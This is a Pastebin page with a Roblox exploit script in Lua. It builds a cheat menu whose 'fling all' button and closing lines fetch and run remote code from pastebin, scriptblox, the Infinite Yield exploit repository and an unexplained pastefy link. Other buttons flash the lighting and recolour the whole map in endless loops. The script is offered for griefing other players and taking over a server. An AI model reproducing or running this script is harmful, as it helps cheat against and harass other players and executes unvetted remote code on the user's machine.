Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
- local Window = Library.CreateLib("fling all quick execute", "DarkTheme")
- local Tab = Window:NewTab("fling all")
- local Section = Tab:NewSection("thingy")
- Section:NewLabel("EZ WINS")
- Section:NewButton("Da fling all", "da fling hood LOL NERDS", function()
- loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Fe-fling-all-10553"))()
- end)
- Section:NewButton("disco", "ButtonInfo", function()
- while true do
- wait(0.5)
- game.Lighting.Ambient = Color3.new(math.random(), math.random(), math.random())
- game.Lighting.ColorShift_Top = Color3.new(math.random(), math.random(), math.random())
- game.Lighting.ColorShift_Bottom = Color3.new(math.random(), math.random(), math.random())
- game.Lighting.ShadowColor = Color3.new(math.random(), math.random(), math.random())
- end
- end)
- Section:NewButton("Change map", "ButtonInfo", function()
- --Made by SUPERSONIC GAMERZ
- while true do
- for _, part in ipairs(workspace:GetDescendants()) do
- if part:IsA("BasePart") then
- local r = math.random()
- local g = math.random()
- local b = math.random()
- part.BrickColor = BrickColor.new(Color3.new(r, g, b))
- end
- end
- wait(0.5)
- end
- end)
- loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
- loadstring(game:HttpGet(('https://pastefy.app/yumu499O/raw'),true))()
- print("this server is owned by me")
Advertisement